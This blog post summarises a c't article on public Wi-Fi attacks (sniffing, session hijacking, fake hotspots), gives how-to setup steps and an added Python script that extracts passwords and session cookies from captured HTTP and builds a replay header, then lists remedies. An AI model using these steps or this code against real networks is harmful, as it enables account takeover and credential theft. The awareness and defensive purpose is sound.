WLAN Security - Beware of (Unknown) Wi-Fi Hotspots

  • Security
  • Published Jan 3, 2012 Updated Jan 2, 2012

In its issue 1/2012, the German c’t magazine published an article about security in Wi-Fi networks. The authors describe how easy it is to gain access to other people’s accounts and passwords in a world where travelers happily connect to any wireless network they can find. This is a short summary of the original article, intended to highlight the dangers.

The attacks described here are made possible by the following:

  • For ease of use, public Wi-Fi networks often do not use encryption (WPA2) at all. Traffic travels through the air unprotected, and anyone within radio range can read it.
  • Even in encrypted networks, communication between individual clients is often not blocked by the access point. This makes ARP spoofing possible, which lets one client redirect and read the traffic of the others.
  • Apart from enterprise networks that use 802.1X with a validated server certificate, the WLAN standards give a client no way to authenticate an access point. Networks are identified by their name (SSID) only, which makes it trivial to set up a fake “Telekom” network, for example.

Attack #1: Information Sniffing

NetworkMiner uses the WinPcap capture driver (also used by Wireshark) to extract data from a wired or wireless network. It automatically stores every image and other file, cookie, username and password it sees in the traffic:

[Screenshot: NetworkMiner]

Setting up this attack is trivial: download and install WinPcap and NetworkMiner, join any public wireless network, run NetworkMiner and wait. Note that a normal client adapter only receives its own traffic plus broadcasts; to see the packets of other clients, the attacker needs either a card in monitor mode or the ARP spoofing mentioned above.

Attack #2: Account Hijacking

DroidSheep works like Firesheep but runs inconspicuously on a smartphone. It captures the session cookies of sites that send them over unencrypted HTTP (most sites did at the time) and injects them into the attacker’s browser, making identity theft a matter of a single tap on a touchscreen.

Setting up this attack is easy: root your Android phone, install DroidSheep, join any public wireless network and run DroidSheep. As soon as another user on the network accesses a website that requires authentication, you are “in”. You can use that site with the victim’s account, read messages, post status updates or take over the account permanently by changing its e-mail address and password.
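What NetworkMiner (attack #1) and DroidSheep (attack #2) do automatically is shown here in a small added example that is not part of the c’t article or of either tool: it parses plaintext HTTP requests as they would be captured on an open hotspot, pulls out HTTP Basic credentials, form logins and session cookies, and builds the Cookie header an attacker would replay in their own browser. The three requests, the host names and the credentials in them are constructed sample data.

```python
"""Extract credentials and session cookies from plaintext HTTP captured on
an open WLAN (added example; constructed sample data, not real captures)."""
import base64
from urllib.parse import parse_qs

# Constructed sample: three requests as they appear on the wire of an
# unencrypted hotspot, one raw request per element.
CAPTURED_REQUESTS = [
    b"POST /login HTTP/1.1\r\nHost: example.com\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 29\r\n\r\n"
    b"user=alice&password=s3cret%21",
    b"GET /inbox HTTP/1.1\r\nHost: example.com\r\n"
    b"Cookie: sessionid=9f3c2a7b; theme=dark\r\n\r\n",
    b"GET /api/status HTTP/1.1\r\nHost: api.example.net\r\n"
    b"Authorization: Basic Ym9iOmh1bnRlcjI=\r\n\r\n",
]

USER_FIELDS = ("user", "username", "email", "login")
PASSWORD_FIELDS = ("password", "pass", "passwd")


def parse_request(raw: bytes) -> dict:
    """Split one HTTP/1.x request into method, path, headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers, "body": body}


def extract_secrets(requests) -> dict:
    """Return (host, user, password) triples and per-host cookie jars."""
    findings = {"credentials": [], "cookies": {}}
    for raw in requests:
        req = parse_request(raw)
        h = req["headers"]
        host = h.get("host", "?")

        # 1. HTTP Basic auth: base64 is an encoding, not encryption.
        auth = h.get("authorization", "")
        if auth.lower().startswith("basic "):
            user, _, pw = base64.b64decode(auth[6:]).decode("latin-1").partition(":")
            findings["credentials"].append((host, user, pw))

        # 2. Form logins: username/password fields in a POST body.
        if req["method"] == "POST" and "x-www-form-urlencoded" in h.get("content-type", ""):
            form = parse_qs(req["body"].decode("latin-1"))
            users = [v[0] for k, v in form.items() if k in USER_FIELDS]
            pws = [v[0] for k, v in form.items() if k in PASSWORD_FIELDS]
            if users and pws:
                findings["credentials"].append((host, users[0], pws[0]))

        # 3. Session cookies: whatever the victim's browser sends is enough
        #    to take over the session, no password needed (the Firesheep/
        #    DroidSheep case).
        if "cookie" in h:
            jar = findings["cookies"].setdefault(host, {})
            for part in h["cookie"].split(";"):
                name, _, value = part.strip().partition("=")
                jar[name] = value
    return findings


def replay_cookie_header(findings: dict, host: str) -> str:
    """Build the Cookie header an attacker injects into their own browser."""
    return "; ".join(f"{k}={v}" for k, v in findings["cookies"].get(host, {}).items())


if __name__ == "__main__":
    found = extract_secrets(CAPTURED_REQUESTS)
    for host, user, pw in found["credentials"]:
        print(f"credential  {host}: {user} / {pw}")
    for host in found["cookies"]:
        print(f"replay      {host}: Cookie: {replay_cookie_header(found, host)}")
```

Everything the script finds was handed to the attacker by the victim’s own client; no flaw in the website is needed beyond the fact that it accepts the login or the cookie over plain HTTP.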

Attack #3: Honeypot

An even easier way of capturing other people’s data than joining the Wi-Fi they use is to make them connect to you. To set this up, enable the mobile hotspot function of your Android phone and choose the name of a popular hotspot provider; in Germany that could be “Telekom”. Then install a packet capturing tool such as “Shark for Root”, which is tcpdump with a simple UI. That is all.

Smartphones that have connected to an open network called “Telekom” in the past will join your access point automatically, because they match remembered networks by name only. All internet traffic of those devices is then routed through your phone, and any unencrypted data can be extracted from the captured traffic afterwards.
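The honeypot works because a device auto-joins any access point that beacons the SSID of a remembered open network. The following added check (not from the c’t article) lists, from a saved-network list in wpa_supplicant.conf syntax, the profiles an attacker could impersonate with nothing but the name. Linux and Android releases of that era kept their remembered networks in this format; the four networks in the sample are constructed.

```python
"""List remembered Wi-Fi profiles that auto-join an attacker's open access
point of the same name (added example; constructed wpa_supplicant.conf data)."""
import re

# Constructed sample: four remembered networks in wpa_supplicant.conf syntax.
SAVED_NETWORKS = """
network={
    ssid="Telekom"
    key_mgmt=NONE
}
network={
    ssid="HomeNet"
    psk="correct horse battery staple"
    key_mgmt=WPA-PSK
}
network={
    ssid="Airport Free WiFi"
    key_mgmt=NONE
    disabled=1
}
network={
    ssid="corp-wlan"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="alice"
}
"""

NETWORK_BLOCK = re.compile(r"network=\{(.*?)\}", re.S)


def parse_networks(conf: str):
    """Yield one dict of key/value settings per network={...} block."""
    for block in NETWORK_BLOCK.findall(conf):
        settings = {}
        for line in block.strip().splitlines():
            key, _, value = line.strip().partition("=")
            if key:
                settings[key] = value.strip('"')
        yield settings


def evil_twin_exposed(conf: str) -> list:
    """SSIDs a fake AP can impersonate by name alone.

    Only enabled open profiles qualify: key_mgmt=NONE without a WEP key.
    wpa_supplicant defaults key_mgmt to WPA-PSK/WPA-EAP when it is omitted,
    so those profiles are not open either. A PSK profile joins only an AP that
    proves the same passphrase in the 4-way handshake, and an EAP profile can
    validate the server certificate, so neither is listed."""
    exposed = []
    for n in parse_networks(conf):
        is_open = n.get("key_mgmt", "WPA-PSK WPA-EAP") == "NONE"
        has_wep = any(k.startswith("wep_key") for k in n)
        if is_open and not has_wep and n.get("disabled") != "1":
            exposed.append(n["ssid"])
    return sorted(exposed)


if __name__ == "__main__":
    for ssid in evil_twin_exposed(SAVED_NETWORKS):
        print(f"auto-joins any AP named {ssid!r}: delete or disable this profile")
```

The practical remedy this points at is the one in the list below: remove remembered open networks (or mark them disabled) once you no longer need them, since nothing in the profile ties the name to a particular access point.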

Remedy

Unfortunately, there is no real remedy as long as the WLAN standards lack significant security features like access point authentication. Here is what you can do today:

  • Use UMTS (3G) instead of Wi-Fi.
  • Only use known secure Wi-Fi networks, e.g. at home and at work.
  • If you operate a Wi-Fi network, disable client-to-client communication on the access point (often called AP or client isolation).
  • Create a guest Wi-Fi network which is separated from the internal production network.
  • Use SSL/TLS encryption wherever possible. Unfortunately, many websites switch back to unencrypted HTTP after the login, which makes account hijacking by cookie theft trivial. Even worse, with smartphone apps there is practically no way to tell whether they communicate securely or not.

c’t explicitly recommends against using a VPN on a smartphone because the combination simply is not safe: after a temporary loss of connectivity the internet connection via WLAN or 3G is restored automatically, but the VPN connection is not, so traffic silently flows unprotected again.
